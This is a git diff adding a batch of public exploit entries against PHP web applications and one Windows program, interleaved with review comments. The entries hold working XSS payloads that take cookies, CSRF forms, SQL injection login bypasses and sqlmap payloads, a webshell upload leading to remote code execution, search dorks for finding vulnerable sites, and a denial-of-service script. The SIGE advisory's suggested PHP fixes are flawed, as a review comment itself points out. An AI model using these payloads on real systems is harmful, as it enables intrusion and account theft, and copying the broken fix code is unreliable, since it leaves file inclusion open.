+POST /pandora_console/index.php?sec=workspace&sec2=operation/incidents/incident_detail&id=3&upload_file=1
+HTTP/1.1
+Host: [HOST]
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0)
+Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+boundary=---------------------------188134206132629608391758747427
+Content-Length: 524
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=3098fl65su4l237navvq6d5igs
+Upgrade-Insecure-Requests: 1
+
+-----------------------------188134206132629608391758747427
+Content-Disposition: form-data; name="userfile"; filename="\"><svg
+onload=alert(document.cookie)>.png"
+Content-Type: image/png
+
+"><svg onload=alert(1)>
+-----------------------------188134206132629608391758747427
+Content-Disposition: form-data; name="file_description"
+
+desc
+-----------------------------188134206132629608391758747427
+Content-Disposition: form-data; name="upload"
+
+Upload
+-----------------------------188134206132629608391758747427--
\ No newline at end of file
diff --git a/exploits/php/webapps/49064.txt b/exploits/php/webapps/49064.txt
new file mode 100644
index 000000000..4b948e8f8
--- /dev/null
+++ b/exploits/php/webapps/49064.txt
@@ -0,0 +1,316 @@
+# Exploit Title: Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities
+# Exploit Author: Vulnerability-Lab
+# Date: 2020-11-11
+# Vendor Homepage: https://kubik-rubik.de/sige-simple-image-gallery-extended
+# Software Link: https://kubik-rubik.de/sige-simple-image-gallery-extended
+# Version: 3.5.3
+
+Document Title:
+===============
+SIGE (Joomla) 3.4.1 & 3.5.3 Pro - Multiple Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2265
+
+
+Release Date:
+=============
+2020-11-11
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2265
+
+
+Common Vulnerability Scoring System:
+====================================
+7.8
+
+
+Vulnerability Class:
+====================
+Multiple
+
+
+Current Estimated Price:
+========================
+2.000€ - 3.000€
+
+
+Product & Service Introduction:
+===============================
+It offers numerous opportunities to present pictures quickly and easily
+in articles. The unique feature of the plugin is
+that you can control any parameter on the syntax call. Editor Button -
+SIGE Parameters: With the button, you can set the
+parameters very easy on-the-fly in an article. It is an excellent
+addition to SIGE. Highlights are: parameter call, watermark
+function, read IPTC data, thumbnail storage, crop function, sort by
+modification date, output as a list, CSS Image Tooltip,
+Editor Button SIGE Parameter and much more. In version 1.7-2, SIGE was
+rewritten entirely and equipped with numerous innovations.
+The absolute highlight is the turbo mode. This feature doesn't exist in
+any other plugin for Joomla!. In Turbo Mode 2 text files
+are created from the HTML output of the gallery and loaded in successive
+runs. This feature eliminates the tedious editing
+process of each image. In a test with 50 large images, the creation of a
+gallery with all the extra features (save thumbnails,
+watermark generation, resize original images, etc.) without turbo mode
+lasted approximately 17 seconds. In turbo mode, it only
+took 1 second, and the gallery on the same scale was available! For
+calling the syntaxes, additionally, an Editor Button has
+been programmed. It makes it very easy to choose the required syntax,
+showing all the settings and parameters of the plugin.
+It is a great enrichment in using the SIGE plugin.
+
+(Copy of the Homepage:
+https://kubik-rubik.de/sige-simple-image-gallery-extended )
+(Software: https://kubik-rubik.de/sige-simple-image-gallery-extended ;
+https://kubik-rubik.de/downloads/sige-simple-image-gallery-extended ;
+https://extensions.joomla.org/extension/photos-a-images/galleries/sige/ )
+
+
+Abstract Advisory Information:
+==============================
+An independent vulnerability laboratory researcher discovered multiple
+web vulnerabilities in the Simple Image Gallery Extended (SIGE) v3.4.1 &
+v3.5.3 pro extension for joomla.
+
+
+Affected Product(s):
+====================
+Vendor:
+Product: Simple Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 Pro -
+Joomla Extension (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-11-10: Researcher Notification & Coordination (Security Researcher)
+2020-11-11: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Open Authentication (Anonymous Privileges)
+
+
+User Interaction:
+=================
+No User Interaction
+
+
+Disclosure Type:
+================
+Full Disclosure
+
+
+Technical Details & Description:
+================================
+1.1
+A file include vulnerability has been discovered in the official Simple
+Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 pro extension for joomla.
+The web vulnerability allows remote attackers to unauthorized upload
+web-shells or malicious contents to compromise the local file-system.
+
+The vulnerability is located in the img parameter of the print.php file.
+Remote attackers are able to upload images to the unrestricted assets
+path to compromise the web-applications file-system and involved
+database management system. Exploitation requires no user interaction
+and only
+a low privileged user account to upload images.
+
+
+1.2
+Multiple non-persistent cross site web vulnerabilities has been
+discovered in the official Simple Image Gallery Extended (SIGE) v3.4.1 &
+v3.5.3 pro extension for joomla.
+The vulnerability allows remote attackers to inject own malicious script
+codes with non-persistent attack vector to compromise browser to
+web-application requests from the client-side.
+
+The non-persistent cross site scripting web vulnerabilities are located
+in the `name` and `title` parameters of the `print.php` file.
+Remote attackers without user or guest privileges are able to make own
+malicious special crafted links to compromise client-side
+GET method requests. The attack vector is non-persistent and the issue
+affects the client-side.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, non-persistent phishing attacks, non-persistent
+external redirects to malicious source and non-persistent client-side
+manipulation of affected application modules.
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The remote file include web vulnerability can be exploited by remote
+attackers without privileged user account or user interaction.
+For security demonstration or to reproduce the persistent cross site web
+vulnerability follow the provided information and steps below to continue.
+
+
+Dork(s):
+intext:"Powered by Simple Image Gallery Extended"
+intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de"
+
+
+PoC: Exploitation
+http://[SERVER/DOMAIN]/[folders]/print.php?img=[RFI
+VULNERABILITY!]&name=[NAME]%20title=[TITLE]
+
+
+1.2
+The non-persistent cross site scripting web vulnerability can be
+exploited by remote attackers without privileged user account and with
+low user interaction.
+For security demonstration or to reproduce the persistent cross site web
+vulnerability follow the provided information and steps below to continue.
+
+
+Dork(s):
+intext:"Powered by Simple Image Gallery Extended"
+intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de"
+
+
+PoC: Payload
+"><svg onload=alert()>
+'><script>alert('');</script>
+<IMG "'"><script>alert()</script>'>
+
+PoC: Example
+http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NON-PERSISTENT XSS]%20title=[TITLE]
+http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NAME]%20title=[NON-PERSISTENT
+XSS]
+
+
+PoC: Exploitation
+http://[SERVER/DOMAIN]/oldsite/plugins/content/sige/plugin_sige/print.php
+?img=http://[SERVER/DOMAIN]/assets/public/js/uploading/images/h4shur/h4.gif&name=%22%3E%3Ch1%3Ehacked%20by%20h4shur%3C/h1%3E%22%20title=%22%3E%3Cscript%3Ealert(%27hacked%20by%20h4shur%27)%3C/script%3E
+
+
+Solution - Fix & Patch:
+=======================
+1.1
+The remote file include vulnerability issue can be resolved by the
+following steps ...
+
+Example :
+?php
+$files=array('test.gif');
+if(in_array($_GET['file'], $files)){
+include ($_GET['file']);
+}
+?
+* If you are a server administrator, turn off allow_url_fopen from the file
+
+* Or do it with the ini_set command. Only for (RFI)
+?php
+ini_set('allow_url_fopen ', 'Off');
+?
+
+* We can use the strpos command to check that if the address is: //
+http, the file will not be enclosed
+?php
+$strpos = strpos($_GET['url'],'http://');
+if(!$strpos){
+include($_GET['url']);
+}
+?
+
+* Using str_replace we can give the given address from two characters
+"/", "." Let's clean up
+?php
+$url=$_GET['url'];
+$url = str_replace("/", "", $url);
+$url = str_replace(".", "", $url);
+include($url);
+?
+
+
+1.2
+The client-side cross site scripting vulnerabilities can be resolved by
+the following steps ...
+1. Encode and escape as parse the name and title parameters
+2. Filter the input for special chars and disallow them in parameters
+
+
+Security Risk:
+==============
+1.1
+The securit risk of the remote file include vulnerability in the img
+path of the web-application request is estimated as high.
+
+1.2
+The security risk of the non-persistent cross site scripting
+vulnerabilities is estimated as medium.
+
+
+Credits & Authors:
+==================
+h4shursec - https://www.vulnerability-lab.com/show.php?user=h4shursec
+Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @netedit0r
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
\ No newline at end of file
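Review bot: The third PHP sample under "Solution - Fix & Patch" 1.1 inverts its own check: `strpos()` returns 0 when `http://` is at the start of the value, so `if(!$strpos)` lets exactly that input reach `include`. It should read `if (strpos($_GET['url'], 'http://') === false)`, and even then it ignores `https://` and other stream wrappers. The `ini_set('allow_url_fopen ', 'Off')` sample has a trailing space inside the directive name, and to my knowledge that directive can only be set at system level (php.ini), with `allow_url_include` being the setting that governs `include`. The `str_replace` sample still hands request data to `include`, so only the first sample (the `in_array` allowlist) is a sound fix, and the text should say so. The samples also open with `?php` and close with `?`; the angle brackets appear to have been stripped.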
diff --git a/exploits/php/webapps/49180.txt b/exploits/php/webapps/49180.txt
new file mode 100644
index 000000000..5220768ca
--- /dev/null
+++ b/exploits/php/webapps/49180.txt
@@ -0,0 +1,32 @@
+# Exploit Title: User Registration & Login and User Management System 2.1 - Cross Site Request Forgery
+# Exploit Author: Dipak Panchal(th3.d1p4k)
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: http://user-registration-login-and-user-management-system-with-admin-panel
+# Version: 5
+# Tested on Windows 10
+
+Attack Vector:
+An attacker can craft HTML page containing POST information to have the
+victim sign into an attacker's account, where the victim can add
+information assuming he/she is logged into the correct account, where in
+reality, the victim is signed into the attacker's account where the changes
+are visible to the attacker.
+
+Exploit:
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://localhost/loginsystem/" method="POST">
+      <input type="hidden" name="uemail" value="user1@mail.com" />
+      <input type="hidden" name="password" value="User@1234" />
+      <input type="hidden" name="login" value="LOG&#32;IN" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+
+Mitigation:
+Please add a csrf token to login request or make some type prompt that the
+session has ended when the new login from attacker occurs.
\ No newline at end of file
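Review bot: The header does not identify the affected build: the title says 2.1 while `# Version: 5` says otherwise. The `# Software Link:` value is a bare slug, not a resolvable URL. The header also has no `# Date:` line, unlike the neighbouring entries. The "Mitigation" paragraph would be more actionable if it named the control, for example `Add an anti-CSRF token bound to a pre-login session to the login form and reject POSTs whose Origin/Referer is not the site's own`. The second suggestion, a prompt when the session changes, only detects the problem after the victim is already signed into the other account.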
diff --git a/exploits/php/webapps/49204.txt b/exploits/php/webapps/49204.txt
new file mode 100644
index 000000000..22d469727
--- /dev/null
+++ b/exploits/php/webapps/49204.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Cyber Cafe Management System  Project (CCMS) 1.0 - Persistent Cross-Site Scripting
+# Date: 04-12-2020
+# Exploit Author: Pruthvi Nekkanti
+# Vendor Homepage: https://phpgurukul.com
+# Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
+# Version: 1.0
+# Tested on: Kali Linux
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in admin username and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: Admin Username.
+
+Steps-To-Reproduce:
+1. Go to the Product admin panel change the admin username
+2. Put this payload in admin username field:"><script>alert(document.cookie)</script>
+3. Now go to the website and the XSS will be triggered.
\ No newline at end of file
diff --git a/exploits/php/webapps/49208.txt b/exploits/php/webapps/49208.txt
new file mode 100644
index 000000000..0a668289d
--- /dev/null
+++ b/exploits/php/webapps/49208.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Savsoft Quiz 5 - 'Skype ID' Stored XSS
+# Exploit Author: Dipak Panchal(th3.d1p4k)
+# Vendor Homepage: https://savsoftquiz.com
+# Software Link: https://github.com/savsofts/savsoftquiz_v5
+# Version: 5
+# Tested on Windows 10
+
+Attack Vector:
+This vulnerability can results attacker to inject the XSS payload in User
+Registration section and each time admin visits the manage user section
+from admin panel, and home page too. XSS triggers and attacker can able to
+steal the cookie according to the crafted payload.
+
+Steps to reproduce:
+1. Create new account and verified it.
+
+2. Navigate to Edit Profile:
+-> http://localhost/savsoftquiz/index.php/user/edit_user/123
+
+3. Put the below Payload in Skype ID field. and submit it.
+Payload: abcd<script>alert("XSS")</script>
+
+4. You will get XSS popup.
\ No newline at end of file
diff --git a/exploits/php/webapps/49209.txt b/exploits/php/webapps/49209.txt
new file mode 100644
index 000000000..06ea8299c
--- /dev/null
+++ b/exploits/php/webapps/49209.txt
@@ -0,0 +1,28 @@
+# Exploit Title: vBulletin 5.6.3 - 'group' Cross Site Scripting
+# Date: 05.09.2020
+# Author: Vincent666 ibn Winnie
+# Software Link: https://www.vbulletin.com/en/features/
+# Tested on: Windows 10
+# Web Browser: Mozilla Firefox & Opera
+# Google Dorks: "Powered by vBulletin® Version 5.6.3"
+
+Go to the "Admin CP" - click on "Styles" - click "Style Manager" -
+Choose "Denim" or other theme and choose action "Add new template" and
+click "Go".
+
+Put on the title "1" and template "1" and "Save and Reload". Now you
+can catch the new URL with HTTP Live Headers or with hands.
+
+So..we have Url :
+
+https://localhost/admincp/template.php?templateid=608&group=&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=168&textareaScrollTop=0
+
+Test it with hands and get cross site scripting. Use for tests
+different browsers. I use Mozilla Firefox and Opera.
+
+https://localhost/admincp/template.php?templateid=1&group=""><script>alert("Cross
+Site Scripting")</script><script>alert(document.cookie)</script>&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=
+
+Picture:
+
+https://imgur.com/a/b6gH5Fn
\ No newline at end of file
diff --git a/exploits/php/webapps/49212.txt b/exploits/php/webapps/49212.txt
new file mode 100644
index 000000000..1892fc234
--- /dev/null
+++ b/exploits/php/webapps/49212.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Online Bus Ticket Reservation 1.0 - SQL Injection
+# Date: 2020-12-07
+# Exploit Author: Sakshi Sharma
+# Vendor Homepage: https://www.sourcecodester.com/php/5012/online-bus-ticket-reservation-using-phpmysql.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/busreservation.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+
+#Vulnerable Page: admin page
+
+#Exploit
+	Open the Application
+	check the URL:
+	http://localhost/busreservation/index.php
+	Open Admin Login
+	Enter username: 'or"='
+	Enter password: 'or"='
+	click on login
+The SQL payload gets executed and authorization is bypassed successfully
\ No newline at end of file
diff --git a/exploits/php/webapps/49215.txt b/exploits/php/webapps/49215.txt
new file mode 100644
index 000000000..dba26e9e4
--- /dev/null
+++ b/exploits/php/webapps/49215.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Employee Performance Evaluation System 1.0 - ' Task and Description' Persistent Cross Site Scripting
+# Date: 08/12/2020
+# Exploit Author: Ritesh Gohil
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14617/employee-performance-evaluation-system-phpmysqli-source-code.html
+# Version: 1.0
+# Tested on: Windows 10/Kali Linux
+
+Steps to Reproduce:
+1) Login with Admin Credentials and click on 'Task' button.
+2) Click on Add New Task Button.
+3) Now add the following payload input field of Task and Description
+
+Payload:  ritesh"><img src=x onerror=alert(document.domain)>
+
+4) Click On Save
+5) XSS payload is triggered.
\ No newline at end of file
diff --git a/exploits/php/webapps/49222.txt b/exploits/php/webapps/49222.txt
new file mode 100644
index 000000000..9908c82df
--- /dev/null
+++ b/exploits/php/webapps/49222.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Task Management System 1.0 - 'First Name and Last Name' Stored XSS
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-08
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1: Log in to the CMS with any valid user credentials.
+Step 2: Click on the logged in username on header and select Manage Account.
+Step 3: Rename the user First Name or Last Name to "
+<script>alert(document.domain)</script> ".
+Step 4: Update Profile and this will trigger the XSS.
+Step 5: Logout and login again and the page will display the domain name.
\ No newline at end of file
diff --git a/exploits/php/webapps/49223.txt b/exploits/php/webapps/49223.txt
new file mode 100644
index 000000000..9c28e79be
--- /dev/null
+++ b/exploits/php/webapps/49223.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Task Management System 1.0 - Unrestricted File Upload to Remote Code Execution
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-08
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: Parrot OS
+
+
+Step 1: Log in to the CMS with any valid user credentials.
+Step 2: Click on the logged in username on header and select Manage Account.
+Step 3: Upload a php payload ( i used the default php webshell in
+/usr/share/webshells/php/php-reverse-shell.php) or a jpeg image embeded
+with a php payload. ("exiftool -Comment='<?php system($_GET['cmd']); ?>'
+r0b0t.jpg") Then update profile.
+Step 4: Click on username on header again and select Manage Account.
+Step 5: Right click on the uploaded php payload or embeded image located
+under the "choose avatar form" then copy image location.
+Step 6: Start nc listener and paste the url in browser. This will trigger
+the remote code execution if you used a php shell.  (
+http://localhost/assets/uploads/1607438280_shell.php )
\ No newline at end of file
diff --git a/exploits/php/webapps/49224.txt b/exploits/php/webapps/49224.txt
new file mode 100644
index 000000000..7397dd5aa
--- /dev/null
+++ b/exploits/php/webapps/49224.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Task Management System 1.0 - 'id' SQL Injection
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-08
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1. Log into application with credentials
+Step 2. Click on Projects
+Step 3. Select View Projects
+Step 4. Choose any project, click on action and select view
+Step 5. Capture the request of the "page=view_project&id=" page in burpsute
+Step 6. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs "
+Step 7. This will inject successfully and you will have an information disclosure of all databases contents
+
+---
+Parameter: id (GET)
+Type: boolean-based blind
+Title: AND boolean-based blind - WHERE or HAVING clause
+Payload: page=view_project&id=3 AND 5169=5169
+
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: page=view_project&id=3 AND (SELECT 3991 FROM (SELECT(SLEEP(5)))NOXH)
+
+Type: UNION query
+Title: Generic UNION query (NULL) - 9 columns
+Payload: page=view_project&id=-2597 UNION ALL SELECT NULL,NULL,CONCAT(0x717a627a71,0x5a46784156705a6e654b6a454d44767155796a466f41436c6667585763424b534a4f4c4e52775a45,0x7176767071),NULL,NULL,NULL,NULL,NULL,NULL-- -
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/49227.txt b/exploits/php/webapps/49227.txt
new file mode 100644
index 000000000..d3a8e7467
--- /dev/null
+++ b/exploits/php/webapps/49227.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Barcodes generator 1.0 - 'name' Stored Cross Site Scripting
+# Date: 10/12/2020
+# Exploit Author: Nikhil Kumar 
+# Vendor Homepage: http://egavilanmedia.com/
+# Software Link: http://egavilanmedia.com/barcodes-generator-using-php-mysql-and-jsbarcode-library/
+# Version: 1.0
+# Tested On: Ubuntu
+
+1. Open the index.php page using following url 
+
+http://localhost/Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/index.php
+
+click on the New Barcode
+
+2. Intercept the request through burp suite
+
+Put a payload on "name=" parameter
+
+Payload :- abc"><script>alert("XSS")</script>
+
+Malicious Request::
+
+POST /Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/php/insert.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 6
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/index.php
+Upgrade-Insecure-Requests: 1
+
+name=abc"><script>alert("XSS")</script>
\ No newline at end of file
diff --git a/exploits/php/webapps/49228.txt b/exploits/php/webapps/49228.txt
new file mode 100644
index 000000000..bbab819dc
--- /dev/null
+++ b/exploits/php/webapps/49228.txt
@@ -0,0 +1,31 @@
+# Exploit Title: OpenCart 3.0.3.6 - Cross Site Request Forgery
+# Date: 12-11-2020
+# Exploit Author: Mahendra Purbia {Mah3Sec}
+# Vendor Homepage: https://www.opencart.com
+# Software Link: https://www.opencart.com/index.php?route=cms/download
+# Version: OpenCart CMS - 3.0.3.6 
+# Tested on: Kali Linux
+
+#Description: 
+This product have the functionality which let user to add the wish-list of other user in to his/her cart. So, user A can add products to his/her wish-list and can make his/her wish-list public which let other users to see the wish-list. Now, as user B there is a button of add to cart , when you click on it that public wish-list will be added in to your cart.
+
+#Additional Information:
+well i found this vulnerability in Opencart based websites but they not respond so i installed a lest version of Opencart CMS and hosted on localhost with help of XAMP and then i exploited that vulnerability.
+Attack Vector:
+1. create two accounts A(attacker) & B(victim)
+2. login with A and add a product in cart and capture that particular request in burpsuite.
+3. Now change the quantity if want and then create a csrf poc of that request.
+4. Save it as .html and send it to victim. Now the product added to victims cart.
+
+#POC: 
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://localhost/shop/index.php?route=checkout/cart/add" method="POST">
+      <input type="hidden" name="product&#95;id" value="43" />
+      <input type="hidden" name="quantity" value="10000000" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/49230.txt b/exploits/php/webapps/49230.txt
new file mode 100644
index 000000000..cd47d80b2
--- /dev/null
+++ b/exploits/php/webapps/49230.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Library Management System 2.0 - Auth Bypass SQL Injection
+# Date: 2020-12-09
+# Exploit Author: Manish Solanki
+# Vendor Homepage: https://www.sourcecodester.com/php/6849/library-management-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=6849&title=Library+Management+System+in+PHP%2FMySQLi+with+Source+Code
+# Version: 2.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+#Vulnerable Page: admin page
+
+#Exploit
+Open the Application
+check the URL:
+http://localhost/eb_magalona_lms
+
+Open Admin Login
+Enter username: a' or 1=1--
+Enter password: '
+
+click on login
+The SQL payload gets executed and authorization is bypassed successfully
\ No newline at end of file
diff --git a/exploits/php/webapps/49231.txt b/exploits/php/webapps/49231.txt
new file mode 100644
index 000000000..62915cfe6
--- /dev/null
+++ b/exploits/php/webapps/49231.txt
@@ -0,0 +1,73 @@
+# Exploit Title: WordPress Plugin Popup Builder 3.69.6 - Multiple Stored Cross Site Scripting
+# Date: 11/27/2020
+# Exploit Author: Ilca Lucian Florin
+# Vendor Homepage: https://sygnoos.com
+# Software Link: https://wordpress.org/plugins/popup-builder/ / https://popup-builder.com/
+# Version: <= 3.69.6
+# Tested on: Latest Version of Desktop Web Browsers: Chrome, Firefox, Microsoft Edge
+
+The Popup Builder – Responsive WordPress Pop up – Subscription & Newsletter
+Plugin is vulnerable to stored cross site scripting. There are multiple
+parameters vulnerable to cross site scripting.
+
+All versions up to 3.69.6 are vulnerable to stored cross site scripting.
+
+More information about this plugin could be found on the following links:
+
+1. https://wordpress.org/plugins/popup-builder/
+2. https://popup-builder.com/
+
+Cross site scripting (XSS) is a common attack vector that injects malicious
+code into a vulnerable web application. XSS differs from other web attack
+vectors (e.g., SQL injections), in that it does not directly target the
+application itself. Instead, the users of the web application are the ones
+at risk. A successful cross site scripting attack can have devastating
+consequences for an online business’s reputation and its relationship with
+its clients. Stored XSS, also known as persistent XSS, is the more damaging
+of the two. It occurs when a malicious script is injected directly into a
+vulnerable web application.
+
+# How to reproduce #
+
+1. Login as Editor or Administrator: https://website.com/wp-login/
+
+2. Go to the following link:
+https://website.com/wp-admin/edit.php?post_type=popupbuilder or search for
+PopUp Builder and select or create new PopUp.
+
+2. Click edit
+
+3. Search and find: # Custom JS or CSS
+
+4. On JS -> Opening events section, add two payloads, one for #2 section
+and one for #3 section, like in the following example:
+
+#2 Add the code you want to run before the popup opens. This will be the
+code that will work in the process of opening the popup. true/false
+conditions will not work in this phase.
+
+<textarea class="wp-editor-area editor-content" data-attr-event="WillOpen"
+placeholder=" #... type your code" mode="text/javascript"
+name="sgpb-WillOpen">"><script
+src="data:;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="></script></textarea>
+
+#3 Add the code you want to run after the popup opens. This code will work
+when the popup is already open on the page.
+
+<textarea class="wp-editor-area editor-content" data-attr-event="DidOpen"
+placeholder=" #... type your code" mode="text/javascript"
+name="sgpb-DidOpen">"><script
+src="data:;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="></script></textarea>
+
+5. Click Update
+
+6. Go to https://website.com. The XSS alert will pop up.
+
+# All text-areas from JS section are vulnerable to stored cross site
+scripting.
+
+Evidence:
+
+1. https://ibb.co/JvBTq0H
+2. https://ibb.co/0KP7NFQ
+3. https://ibb.co/3cFnVYF
\ No newline at end of file
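Review bot: The write-up never states which trust boundary is crossed. The two textareas (`sgpb-WillOpen`, `sgpb-DidOpen`) sit under "Custom JS or CSS" and are described on the page itself as "the code you want to run" on popup events, so script executing there looks like the field's documented purpose for a user who can edit popups. If the finding is that an Editor-level account can plant script that later runs in an Administrator's or visitor's session, the entry should say so explicitly and name the least-privileged role that reaches the field. The steps under "How to reproduce" also number two different steps as `2.`.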
diff --git a/exploits/windows/dos/49206.txt b/exploits/windows/dos/49206.txt
new file mode 100644
index 000000000..178a59860
--- /dev/null
+++ b/exploits/windows/dos/49206.txt
@@ -0,0 +1,30 @@
+# Exploit Title: TapinRadio 2.13.7 - Denial of Service (PoC)
+# Date: 2020-05-12
+# Exploit Author: Ismael Nava
+# Vendor Homepage: http://www.raimersoft.com/
+# Software Link: www.raimersoft.com/downloads/tapinradio_setup_x64.exe
+# Version: 2.13.7 x64
+# Tested on: Windows 10 Home x64
+
+#STEPS
+# Open the program TapinRadio 
+# In Settings select Preferences option
+# Click in Miscellaneous and click in Set Application Proxy
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Mikon.txt"
+# Paste the content in the field Username and Address and click in OK
+# Click in Ok again
+# After TapinRadio closed, the program did not work again if the user try to open again, so it is necessary uninstall and install again
+# End :)
+
+
+buffer = 'K' * 20000
+
+try: 
+    file = open("Mikon.txt","w")
+    file.write(buffer)
+    file.close()
+
+    print("Archive ready")
+except:
+    print("Archive no ready")
\ No newline at end of file
